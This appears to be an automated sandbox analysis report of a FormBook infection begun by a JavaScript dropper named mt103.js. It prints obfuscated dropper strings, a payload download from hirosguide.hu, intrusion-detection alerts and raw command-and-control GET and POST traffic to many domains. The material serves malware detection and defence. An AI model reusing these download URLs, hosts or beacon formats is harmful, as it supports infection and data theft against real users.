          Source: mt103.jsArgument value : ['"Shell.Application"', 'ScriptFullName,F8kIdw8uWQKJssddISkJW51zcW,W5S9W7KHWQtdJMhdSGpcIKnHWPun,24cwPSlC,W5hdPKP/WRyhD3VcSSkO', 'ymkUWO3cOMS,EmosWRVcNSolFa1ihmofWPhcNa,150UECBKi,W7lcSCkiWOzfa8oxWR5MF8kvWO7dKZu,3428070zJPwOJ,push,', 'EmosWRVcNSolFa1ihmofWPhcNa,150UECBKi,W7lcSCkiWOzfa8oxWR5MF8kvWO7dKZu,3428070zJPwOJ,push,460031zEcYIe', '"Scripting.FileSystemObject"', 'WO41qK7cRvBcISoBWQBcVJxcMW,536561IZdlNV,ScriptFullName,F8kIdw8uWQKJssddISkJW51zcW,W5S9W7KHWQtdJMhdSG', '"SaveToFile"', '"Shell.Application","NnEE"', '"ADODB.Stream"', '536561IZdlNV,ScriptFullName,F8kIdw8uWQKJssddISkJW51zcW,W5S9W7KHWQtdJMhdSGpcIKnHWPun,24cwPSlC,W5hdPKP']Go to definition
          Source: mt103.jsReturn value : ['"Shell.Application"', 'ScriptFullName,F8kIdw8uWQKJssddISkJW51zcW,W5S9W7KHWQtdJMhdSGpcIKnHWPun,24cwPSlC,W5hdPKP/WRyhD3VcSSkO', 'ymkUWO3cOMS,EmosWRVcNSolFa1ihmofWPhcNa,150UECBKi,W7lcSCkiWOzfa8oxWR5MF8kvWO7dKZu,3428070zJPwOJ,push,', 'EmosWRVcNSolFa1ihmofWPhcNa,150UECBKi,W7lcSCkiWOzfa8oxWR5MF8kvWO7dKZu,3428070zJPwOJ,push,460031zEcYIe', '24cwPSlC,W5hdPKP/WRyhD3VcSSkOWRzpw8kJWQqxW57dKmkQW5JcJSoysvelWRBdPKNcS37cHJJcLW,hSkNWP3dMdulzwhcT0e,', '"Scripting.FileSystemObject"', 'WO41qK7cRvBcISoBWQBcVJxcMW,536561IZdlNV,ScriptFullName,F8kIdw8uWQKJssddISkJW51zcW,W5S9W7KHWQtdJMhdSG', 'W5S9W7KHWQtdJMhdSGpcIKnHWPun,24cwPSlC,W5hdPKP/WRyhD3VcSSkOWRzpw8kJWQqxW57dKmkQW5JcJSoysvelWRBdPKNcS3', 'F8kIdw8uWQKJssddISkJW51zcW,W5S9W7KHWQtdJMhdSGpcIKnHWPun,24cwPSlC,W5hdPKP/WRyhD3VcSSkOWRzpw8kJWQqxW57', '"SaveToFile"', '"Shell.Application","NnEE"', '"ADODB.Stream"', '536561IZdlNV,ScriptFullName,F8kIdw8uWQKJssddISkJW51zcW,W5S9W7KHWQtdJMhdSGpcIKnHWPun,24cwPSlC,W5hdPKP']Go to definition
          Source: mt103.jsArgument value : ['"Shell.Application"', 'ScriptFullName,F8kIdw8uWQKJssddISkJW51zcW,W5S9W7KHWQtdJMhdSGpcIKnHWPun,24cwPSlC,W5hdPKP/WRyhD3VcSSkO', 'ymkUWO3cOMS,EmosWRVcNSolFa1ihmofWPhcNa,150UECBKi,W7lcSCkiWOzfa8oxWR5MF8kvWO7dKZu,3428070zJPwOJ,push,', 'EmosWRVcNSolFa1ihmofWPhcNa,150UECBKi,W7lcSCkiWOzfa8oxWR5MF8kvWO7dKZu,3428070zJPwOJ,push,460031zEcYIe', '24cwPSlC,W5hdPKP/WRyhD3VcSSkOWRzpw8kJWQqxW57dKmkQW5JcJSoysvelWRBdPKNcS37cHJJcLW,hSkNWP3dMdulzwhcT0e,', '"Scripting.FileSystemObject"', 'WO41qK7cRvBcISoBWQBcVJxcMW,536561IZdlNV,ScriptFullName,F8kIdw8uWQKJssddISkJW51zcW,W5S9W7KHWQtdJMhdSG', 'W5S9W7KHWQtdJMhdSGpcIKnHWPun,24cwPSlC,W5hdPKP/WRyhD3VcSSkOWRzpw8kJWQqxW57dKmkQW5JcJSoysvelWRBdPKNcS3', 'F8kIdw8uWQKJssddISkJW51zcW,W5S9W7KHWQtdJMhdSGpcIKnHWPun,24cwPSlC,W5hdPKP/WRyhD3VcSSkOWRzpw8kJWQqxW57', '"SaveToFile"', '"Shell.Application","NnEE"', '"ADODB.Stream"', '536561IZdlNV,ScriptFullName,F8kIdw8uWQKJssddISkJW51zcW,W5S9W7KHWQtdJMhdSGpcIKnHWPun,24cwPSlC,W5hdPKP']Go to definition
          Source: C:\Windows\SysWOW64\control.exeCode function: 4x nop then pop edi11_2_004F8D80
          Source: C:\Windows\SysWOW64\control.exeCode function: 4x nop then pop edi11_2_004F8D7F

          Networking

          barindex
          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exeNetwork Connect: 76.223.105.230 80Jump to behavior
          Source: C:\Windows\System32\wscript.exeDomain query: hirosguide.hu
          Source: C:\Windows\System32\wscript.exeNetwork Connect: 91.227.138.48 443Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 208.91.197.27 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 163.44.198.50 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.nftspaceview.com
          Source: C:\Windows\explorer.exeDomain query: www.hvlandscapes.biz
          Source: C:\Windows\explorer.exeDomain query: www.hayuterce.com
          Source: C:\Windows\explorer.exeDomain query: www.nortonseecurity.com
          Source: C:\Windows\explorer.exeDomain query: www.n-r-eng.com
          Source: C:\Windows\explorer.exeDomain query: www.thepromotionhunter.com
          Source: C:\Windows\explorer.exeNetwork Connect: 103.221.223.104 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 156.227.6.30 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 81.17.29.148 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.mitsubangsaen.online
          Source: C:\Windows\explorer.exeDomain query: www.tf8dangky.online
          Source: C:\Windows\explorer.exeNetwork Connect: 162.241.2.66 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 46.28.105.2 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 164.88.201.214 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.sandpiper-apts.com
          Source: C:\Windows\explorer.exeDomain query: www.popcors.com
          Source: C:\Windows\explorer.exeDomain query: www.frogair.online
          Source: C:\Windows\explorer.exeNetwork Connect: 184.94.215.91 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 18.138.206.213 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 81.169.145.72 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.teammart.online
          Source: C:\Windows\explorer.exeDomain query: www.laylaroseuk.com
          Source: C:\Windows\explorer.exeDomain query: www.wylvxing.com
          Source: C:\Windows\explorer.exeDomain query: www.suachuadienlanh247.com
          Source: C:\Windows\explorer.exeNetwork Connect: 2.57.90.16 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 173.230.227.171 80Jump to behavior
          Snort IDS alert for network traffic
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49731 -> 184.94.215.91:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49731 -> 184.94.215.91:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49731 -> 184.94.215.91:80
          JavaScript source code contains functionality to generate code involving HTTP requests or file downloads
          Source: mt103.jsReturn value : ['"MSXML2.XMLHTTP"']Go to definition
          Source: mt103.jsReturn value : ['ScriptFullName,F8kIdw8uWQKJssddISkJW51zcW,W5S9W7KHWQtdJMhdSGpcIKnHWPun,24cwPSlC,W5hdPKP/WRyhD3VcSSkO', 'WO41qK7cRvBcISoBWQBcVJxcMW,536561IZdlNV,ScriptFullName,F8kIdw8uWQKJssddISkJW51zcW,W5S9W7KHWQtdJMhdSG', '536561IZdlNV,ScriptFullName,F8kIdw8uWQKJssddISkJW51zcW,W5S9W7KHWQtdJMhdSGpcIKnHWPun,24cwPSlC,W5hdPKP']Go to definition
          Source: mt103.jsReturn value : ['WO41qK7cRvBcISoBWQBcVJxcMW,536561IZdlNV,ScriptFullName,F8kIdw8uWQKJssddISkJW51zcW,W5S9W7KHWQtdJMhdSG']Go to definition
          Source: mt103.jsReturn value : ['"MSXML2.XMLHTTP"']Go to definition
          Source: mt103.jsReturn value : ['WO41qK7cRvBcISoBWQBcVJxcMW,536561IZdlNV,ScriptFullName,F8kIdw8uWQKJssddISkJW51zcW,W5S9W7KHWQtdJMhdSG']Go to definition
          Source: mt103.jsReturn value : ['"ResponseBody"']Go to definition
          Source: mt103.jsReturn value : ['WO41qK7cRvBcISoBWQBcVJxcMW,536561IZdlNV,ScriptFullName,F8kIdw8uWQKJssddISkJW51zcW,W5S9W7KHWQtdJMhdSG']Go to definition
          Source: mt103.jsReturn value : ['"MSXML2.XMLHTTP"']Go to definition
          Source: mt103.jsReturn value : ['"MSXML2.XMLHTTP"']Go to definition
          Source: mt103.jsReturn value : ['"MSXML2.XMLHTTP"']Go to definition
          Source: mt103.jsReturn value : ['ScriptFullName,F8kIdw8uWQKJssddISkJW51zcW,W5S9W7KHWQtdJMhdSGpcIKnHWPun,24cwPSlC,W5hdPKP/WRyhD3VcSSkO', '24cwPSlC,W5hdPKP/WRyhD3VcSSkOWRzpw8kJWQqxW57dKmkQW5JcJSoysvelWRBdPKNcS37cHJJcLW,hSkNWP3dMdulzwhcT0e,', 'WO41qK7cRvBcISoBWQBcVJxcMW,536561IZdlNV,ScriptFullName,F8kIdw8uWQKJssddISkJW51zcW,W5S9W7KHWQtdJMhdSG', 'W5S9W7KHWQtdJMhdSGpcIKnHWPun,24cwPSlC,W5hdPKP/WRyhD3VcSSkOWRzpw8kJWQqxW57dKmkQW5JcJSoysvelWRBdPKNcS3', 'F8kIdw8uWQKJssddISkJW51zcW,W5S9W7KHWQtdJMhdSGpcIKnHWPun,24cwPSlC,W5hdPKP/WRyhD3VcSSkOWRzpw8kJWQqxW57', '536561IZdlNV,ScriptFullName,F8kIdw8uWQKJssddISkJW51zcW,W5S9W7KHWQtdJMhdSGpcIKnHWPun,24cwPSlC,W5hdPKP']Go to definition
          Source: Joe Sandbox ViewASN Name: OIS1US OIS1US
          Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
          Source: global trafficHTTP traffic detected: GET /crhz/?vG=1rNCCz7kTcLTieqVkhzplJgcoI94HvPGoNH0lVnmkmFXwmlt9jZmgzPB/kdX+WOK+rGt5Wg7VkzKMCVbaV5wfyZJWCK5Z18H2VF/y4/Kognk&s91Fd8=b8xjX_ HTTP/1.1Host: www.laylaroseuk.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /crhz/?vG=LNHYCELR2jrkl6ex9ablCycu9h3K7h+sZB96ERWJZAieoidRiLebg6j0RcHsFDDJ9r29OHFtYH9IplqsElTHfTI2iz39I/8+/5l0mHu4niU0&s91Fd8=b8xjX_ HTTP/1.1Host: www.sandpiper-apts.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /crhz/?vG=4blG9eK7alfY4URLGxkOib9O4UWCECbcMJ2fHD64T+pOqyJeQKS/uT906cjCl4jdAQhvn7mHg7wgiqcNtMEnJIHJg+N9005boEqGm8iwl7o0&s91Fd8=b8xjX_ HTTP/1.1Host: www.tf8dangky.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /crhz/?vG=4Z6KAxgBWslvyWQs2zz1LTCSIJZnXz/Wr59nnN1quAvIIyJUwPyWYoHYYm82bfT5dpIzg2ZgrTpqnEgpaKo3IMTbbHn1kxCLU7tvpznsmq41&s91Fd8=b8xjX_ HTTP/1.1Host: www.teammart.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /crhz/?vG=CCCEekJcxP1BHV4uutXMBlMorQncoYcW7RlEC0I+F0KDkaobIF+zubJ5fpyHcR0fDKGG4SO4PI1fmloML0V8WxzpJC6D/H2QJAQp0zm+InHs&s91Fd8=b8xjX_ HTTP/1.1Host: www.suachuadienlanh247.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /crhz/?vG=tmPv/9YflmeFyaovhpy86TX5rNY2iNLCfFTw46C4YL4FjsvtgGKrRmf5O7NIQw/qRR8QJqKEWoluew4y5+XfIT1Onmlscs+4wa7bdRvmZkTM&s91Fd8=b8xjX_ HTTP/1.1Host: www.hvlandscapes.bizConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /crhz/?vG=iycDOFv4tLFlCihz1M/bkpzttTI3wOwIoAcOv31GIYKsRKZ8f8EzkP6Z56SPUyztaOnMa+iauXtsUeY/SnJCIVqiEyUfq8kF6FnqNv3PiNZk&s91Fd8=b8xjX_ HTTP/1.1Host: www.frogair.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /crhz/?vG=nqmZBp2BkKhv5XD7JtliHBtb5J/nACgDXsCawcooXFLLWI2M3W+/ErAqTridlmxSnsXQQ5N94lpVUeLYPOpWHcmhsJP5m/P/TeGXz1gc+4vL&s91Fd8=b8xjX_ HTTP/1.1Host: www.mitsubangsaen.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /crhz/?vG=qQeRCSv6osLquMzUsT5auAtcL2kpuT7TXoM3AMsXZ7zh5sUe46PrJPqpdbUyVeYEw0ooLJaeJdeynj+iQ6oazAlglr/WxPNHjeDwf7x3jgqV&s91Fd8=b8xjX_ HTTP/1.1Host: www.hayuterce.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /crhz/?vG=Tx9+97zXAbAnLmq4XNOsmb2GkF5HGNr6W72qHdNRTeliJERxp4RJ6liISWgIuo8dFog55DG7ffTMmIYpdbhnOORXqYw1ibeJvOeh5iF0aDaW&s91Fd8=b8xjX_ HTTP/1.1Host: www.wylvxing.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /crhz/?vG=0GDp9E6kCyw3PTEu7mcwaVDMse4qTFHKiPIjsnORLRuzWwrUUyHW5NbJCCyvt5dATvUBD9WLW/i5ogrnJ/OA7NWjCE9u9zkY8p+SshpKLRL6&s91Fd8=b8xjX_ HTTP/1.1Host: www.popcors.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /crhz/?vG=7PBSSZr71x6DL80+Go9LpHzLxq3YNNMMRlSEKhN5FSdA0XFSySCq1gq9Qp9tYYXK4CHyqoic/rLoBaFB2vw5CqcWWhDf4yMIsnGwhNAmLwJ5&s91Fd8=b8xjX_ HTTP/1.1Host: www.thepromotionhunter.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /crhz/?vG=u2x6Gy1HortC0OzN6Cd7rlFhxGPGvueuCm4nHgUvPGM1CfYq7BcXTxTrgZqaFf90LIlR1PLFkcg9+OygBsERh/kgPh37+bmZ6fYtcBDUzbx8&s91Fd8=b8xjX_ HTTP/1.1Host: www.nortonseecurity.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ti/HBhG.exe HTTP/1.1Accept: */*Accept-Language: en-usUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: hirosguide.huConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: POST /crhz/ HTTP/1.1Host: www.sandpiper-apts.comConnection: closeContent-Length: 188Cache-Control: no-cacheOrigin: http://www.sandpiper-apts.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.sandpiper-apts.com/crhz/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 76 47 3d 47 50 76 34 42 78 75 39 6b 78 61 45 69 49 75 4b 72 4a 37 72 63 31 41 72 28 79 4c 57 33 54 36 4e 42 30 55 46 43 52 53 30 50 6e 65 57 67 77 74 78 74 63 43 62 67 35 33 30 5a 5a 62 49 4b 48 69 6a 71 5a 76 30 54 79 52 35 51 55 67 2d 77 56 71 54 50 42 50 78 59 79 49 66 6c 45 75 6e 4a 4d 64 49 72 5a 6c 78 68 31 4b 54 6d 58 46 69 5a 55 48 76 4b 6f 67 63 70 6b 55 54 28 48 71 53 52 6b 70 6b 50 4e 58 57 6c 4c 66 39 70 47 4c 6c 30 42 59 32 72 5a 69 69 41 61 39 34 66 6b 57 50 62 61 53 4b 39 78 6a 55 44 70 39 77 75 2d 41 68 71 75 68 6e 30 37 61 4f 37 64 41 2e 00 00 00 00 00 00 00 00 Data Ascii: vG=GPv4Bxu9kxaEiIuKrJ7rc1Ar(yLW3T6NB0UFCRS0PneWgwtxtcCbg530ZZbIKHijqZv0TyR5QUg-wVqTPBPxYyIflEunJMdIrZlxh1KTmXFiZUHvKogcpkUT(HqSRkpkPNXWlLf9pGLl0BY2rZiiAa94fkWPbaSK9xjUDp9wu-Ahquhn07aO7dA.
          Source: global trafficHTTP traffic detected: POST /crhz/ HTTP/1.1Host: www.sandpiper-apts.comConnection: closeContent-Length: 1452Cache-Control: no-cacheOrigin: http://www.sandpiper-apts.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.sandpiper-apts.com/crhz/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 76 47 3d 47 50 76 34 42 78 75 39 6b 78 61 45 6a 70 65 4b 71 71 54 72 4c 46 41 30 6d 79 4c 57 7e 7a 36 4a 42 30 6f 46 43 55 7a 76 50 56 53 57 67 6e 78 78 74 2d 71 62 69 35 33 30 4f 4a 62 4d 46 6e 69 70 71 5a 71 4e 54 33 74 50 51 57 4d 2d 32 30 36 54 4a 44 58 32 58 69 49 64 68 45 75 6d 4a 4d 63 53 72 5a 30 32 68 32 6d 35 6d 58 4e 69 5a 69 72 76 43 34 67 54 6d 45 55 54 28 48 71 4f 52 6b 6f 39 50 4e 66 4f 6c 50 54 55 70 31 6a 6c 33 6c 41 32 74 36 4b 74 4a 36 39 30 63 6b 58 7a 61 5f 4f 42 6c 42 76 51 56 35 4a 31 7e 4e 30 7a 6d 66 4d 35 6f 71 53 4a 28 59 59 6f 5a 50 75 54 46 70 66 43 77 75 67 62 43 34 70 6c 42 59 39 57 54 69 6a 6e 31 75 4b 53 64 52 47 75 55 77 54 6d 59 76 66 65 44 5f 4a 59 33 4b 51 5a 4a 33 66 4e 43 6d 75 2d 6a 59 4b 43 66 2d 52 78 52 36 53 50 64 4a 34 55 45 34 47 6a 53 30 62 68 63 58 41 6a 54 46 47 57 53 67 4a 4f 4b 76 50 36 41 50 41 59 4e 2d 57 6f 78 4d 79 69 61 74 4e 76 56 42 58 62 49 6f 72 5a 75 68 77 44 56 30 7a 4a 71 54 35 69 69 45 35 66 6d 33 6c 6f 33 49 7a 4e 50 41 32 6d 68 32 67 70 4a 69 43 65 31 4e 41 49 74 59 47 62 47 42 56 38 75 2d 53 69 57 6e 51 4f 33 79 54 6c 46 79 72 51 7a 57 61 48 67 45 6c 5a 6e 42 4c 79 69 78 46 4a 42 69 34 78 31 41 36 72 51 55 63 6a 46 7a 70 62 39 42 51 4c 44 70 57 6e 47 47 36 2d 79 4d 69 7a 64 36 70 6f 50 64 78 59 51 67 6a 44 43 63 68 39 42 6e 32 70 59 44 59 6e 28 6d 34 6c 76 39 37 74 61 5f 36 66 42 39 75 55 31 6e 73 4d 72 39 38 42 4d 44 47 69 6b 72 47 35 7a 38 38 64 6c 5a 34 48 76 75 64 44 4a 53 37 36 70 37 79 62 52 52 71 44 44 76 4d 59 58 71 32 5f 67 73 55 59 57 33 63 67 33 71 49 70 62 65 65 58 64 42 65 44 28 54 45 73 35 6f 4c 4a 75 7a 47 68 5a 74 49 70 71 67 49 4f 49 77 34 64 42 30 64 50 76 41 32 30 6c 44 55 62 4f 32 45 77 67 56 66 6a 61 71 33 4a 68 45 44 57 36 55 76 2d 6c 33 65 50 71 6e 4b 73 38 6e 47 66 55 78 78 74 4e 46 4b 70 38 34 77 69 73 36 6d 74 4b 63 49 46 58 31 58 46 4d 46 28 6c 78 47 28 54 57 6a 38 35 6b 30 53 51 56 4d 68 4e 42 66 58 37 77 57 45 68 6f 64 48 67 68 4c 6b 42 33 52 7a 65 55 5f 56 36 36 43 55 73 54 61 69 2d 33 5f 59 48 6c 73 59 72 4d 55 57 31 54 71 70 6e 33 46 6d 70 6c 50 30 4d 53 68 30 73 55 4d 68 51 72 70 71 75 61 6e 55 30 74 44 62 59 7e 65 4a 79 54 46 6c 6e 33 75 31 33 4b 4f 52 79 65 7a 4a 42 73 44 4c 63 70 38 47 67 61 70 68 5f 5a 30 4f 71 61 67 38 46 6d 6e 58 57 54 4c 48 4f 39 32 44 36 61 47 49 65 56 70 75 67 7e 78 78 36 46 69 4f 7a 68 44 70 5a 73 56 33 4f 52 31 7a 58 64 65 7e 4f 67 72 34 69 58 61 71 63 28 4c 56 59 37 76 71 5f 53 35 50 44 6e 36 79 5f 51 52 32 63 34 73 59 55 4a 48 28 6a 4c 53 79 31 78 5a 6f 34 36 77 6b 43 6f 37 38 34 4b 63 7a 75 6c 65 6d 59 5a 3
          Source: global trafficHTTP traffic detected: POST /crhz/ HTTP/1.1Host: www.tf8dangky.onlineConnection: closeContent-Length: 188Cache-Control: no-cacheOrigin: http://www.tf8dangky.onlineUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.tf8dangky.online/crhz/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 76 47 3d 31 5a 4e 6d 7e 71 37 64 47 32 57 50 6f 57 74 51 5a 43 63 2d 67 70 42 7a 34 58 53 39 47 48 76 4f 65 65 62 4e 55 58 57 38 4d 49 31 50 6f 53 63 46 61 74 75 6e 6d 44 45 70 38 34 7a 6f 69 34 7e 6e 58 44 35 78 71 4e 69 51 72 71 56 51 30 49 4d 79 71 59 59 5f 48 74 28 36 39 39 52 64 33 58 68 30 70 6b 61 67 71 4e 7e 74 6e 38 78 5f 35 6f 68 7a 48 76 6b 58 71 6c 71 35 36 76 71 35 6e 33 31 71 74 75 78 70 4d 43 63 43 56 75 34 75 73 71 56 75 61 6d 46 36 28 45 4a 37 38 77 55 67 65 6e 74 35 6d 6b 46 5a 30 45 39 63 4e 6e 31 4a 36 48 59 41 4e 6d 53 71 62 56 45 2e 00 00 00 00 00 00 00 00 Data Ascii: vG=1ZNm~q7dG2WPoWtQZCc-gpBz4XS9GHvOeebNUXW8MI1PoScFatunmDEp84zoi4~nXD5xqNiQrqVQ0IMyqYY_Ht(699Rd3Xh0pkagqN~tn8x_5ohzHvkXqlq56vq5n31qtuxpMCcCVu4usqVuamF6(EJ78wUgent5mkFZ0E9cNn1J6HYANmSqbVE.
          Source: global trafficHTTP traffic detected: POST /crhz/ HTTP/1.1Host: www.tf8dangky.onlineConnection: closeContent-Length: 1452Cache-Control: no-cacheOrigin: http://www.tf8dangky.onlineUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.tf8dangky.online/crhz/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 76 47 3d 31 5a 4e 6d 7e 71 37 64 47 32 57 50 79 33 64 51 62 68 6b 2d 6f 70 42 38 30 33 53 39 4e 6e 76 4b 65 65 58 4e 55 57 53 73 50 36 35 50 6f 42 6b 46 55 75 47 6e 6b 44 45 70 7e 34 7a 6b 6d 34 7e 4c 58 44 39 31 71 4d 53 36 72 6f 35 51 32 72 30 79 6f 61 41 38 4e 39 7e 63 71 74 52 65 33 58 68 6c 70 6b 4b 73 71 4e 4b 58 6e 38 70 5f 35 61 4a 7a 57 76 6b 55 6c 46 71 35 36 76 71 39 6e 33 30 7a 74 75 70 50 4d 47 59 53 53 59 55 75 70 36 31 75 63 42 78 39 32 6b 4a 5f 69 41 56 66 4f 79 77 76 38 47 45 64 37 6b 52 37 59 58 30 37 31 32 56 75 4b 48 65 72 5a 44 36 74 63 30 55 4b 56 51 4b 67 78 68 37 38 69 6f 39 36 53 31 52 48 42 56 61 68 70 6d 30 79 36 4b 31 31 4a 65 55 78 37 59 76 48 34 61 74 4b 5a 62 6d 62 62 64 66 4c 6e 6e 64 63 50 6b 35 58 37 32 63 63 43 4b 76 47 28 37 71 62 4f 50 44 70 38 52 51 36 55 53 49 31 59 47 53 2d 7a 46 56 30 43 56 6d 66 67 73 54 59 31 61 71 5f 44 4b 6b 6c 42 6a 54 75 6c 4e 55 51 33 51 34 63 38 76 63 51 41 33 47 71 73 66 46 43 7a 49 47 31 37 56 4f 68 48 4e 73 4f 4b 72 4e 79 76 6c 7e 4b 35 64 4c 63 33 57 66 70 66 6d 35 5a 52 48 28 75 46 72 39 77 38 48 51 69 36 58 4d 41 58 2d 4f 77 49 4a 6d 33 5a 79 67 53 43 6a 49 64 47 63 37 5f 63 52 57 36 78 4c 70 47 47 49 52 4e 61 35 69 51 76 41 73 58 57 65 56 5a 4a 76 71 71 34 75 6c 30 59 34 64 31 74 41 4d 31 30 39 45 33 64 72 68 30 68 53 45 49 51 64 4c 31 36 62 70 36 68 5f 64 61 6c 43 7e 76 47 70 28 6d 6b 6e 37 7a 7e 5a 38 33 4c 47 6e 49 66 55 4b 65 6a 37 46 6e 77 75 5a 4a 44 77 64 47 49 4e 6d 47 72 62 31 6c 57 47 77 49 7e 77 5a 2d 6f 6e 76 54 32 5a 68 53 76 63 48 2d 7a 4c 77 4d 57 6d 62 42 4d 55 36 5a 6b 36 49 36 6e 56 5a 73 36 46 73 4a 76 70 38 6e 64 5f 57 62 37 79 53 73 4c 65 30 74 72 76 39 42 6b 62 32 4f 41 53 5a 57 41 4c 28 49 4d 6f 51 37 66 32 4d 63 69 71 63 37 59 72 7a 71 38 67 78 65 34 46 4a 66 36 76 47 54 41 42 7a 61 57 43 58 44 45 42 6f 36 77 4a 34 58 6e 33 37 6c 56 35 37 49 56 47 67 55 75 37 4a 50 30 51 48 6f 54 6f 32 53 6d 61 35 53 4b 46 74 55 67 38 6e 73 7e 64 62 38 36 2d 70 7a 39 78 7e 51 34 71 58 77 49 78 31 61 67 37 47 4c 68 37 4b 57 47 42 4a 76 4f 31 32 54 39 72 78 77 39 69 41 6e 4d 41 46 35 4f 30 6a 36 71 71 6b 4a 33 6c 4d 2d 44 68 61 71 61 68 41 4e 38 77 72 4f 36 31 77 55 6a 64 37 4f 4b 58 69 70 56 74 35 57 6f 44 43 53 6a 50 51 68 28 79 6e 73 57 4b 67 61 43 67 73 54 78 6f 41 42 53 49 4b 79 4c 72 7a 73 4e 42 66 61 73 65 31 61 57 4c 62 72 6b 34 57 49 62 2d 50 77 67 43 76 71 37 4e 36 48 56 56 41 55 78 51 65 61 5a 49 51 6a 6b 56 68 5f 28 6e 45 32 4b 53 51 75 77 50 38 65 61 53 33 30 37 4f 6c 67 74 75 30 63 67 6f 50 74 30 66 35 44 4d 63 44 74 41 7a 6b 4b 69 58 49 66 6f 63 69 4
          Source: global trafficHTTP traffic detected: POST /crhz/ HTTP/1.1Host: www.teammart.onlineConnection: closeContent-Length: 188Cache-Control: no-cacheOrigin: http://www.teammart.onlineUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.teammart.online/crhz/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 76 47 3d 31 62 53 71 44 46 52 35 4f 76 63 4e 36 33 74 4b 71 42 6e 31 47 51 57 68 49 5f 64 69 55 54 6a 6e 78 2d 77 38 69 4b 78 78 78 6b 33 36 45 41 6c 41 7a 76 36 57 50 4f 43 48 61 57 59 6d 55 62 69 5a 54 4b 51 74 7e 53 31 4f 71 68 4a 72 7a 77 49 38 54 63 31 33 4a 50 44 75 59 33 44 30 6c 68 66 37 48 34 5a 75 71 7a 76 54 69 64 4a 35 78 41 48 51 75 71 52 6b 35 54 68 31 6a 65 31 67 4a 67 49 78 42 49 32 70 4a 70 62 71 47 57 6a 76 65 69 76 4e 35 49 6c 75 45 2d 5a 76 59 50 73 63 75 71 6e 34 4b 61 67 70 79 6a 57 47 64 54 32 7a 49 74 39 54 6e 41 70 63 6c 70 4d 2e 00 00 00 00 00 00 00 00 Data Ascii: vG=1bSqDFR5OvcN63tKqBn1GQWhI_diUTjnx-w8iKxxxk36EAlAzv6WPOCHaWYmUbiZTKQt~S1OqhJrzwI8Tc13JPDuY3D0lhf7H4ZuqzvTidJ5xAHQuqRk5Th1je1gJgIxBI2pJpbqGWjveivN5IluE-ZvYPscuqn4KagpyjWGdT2zIt9TnApclpM.
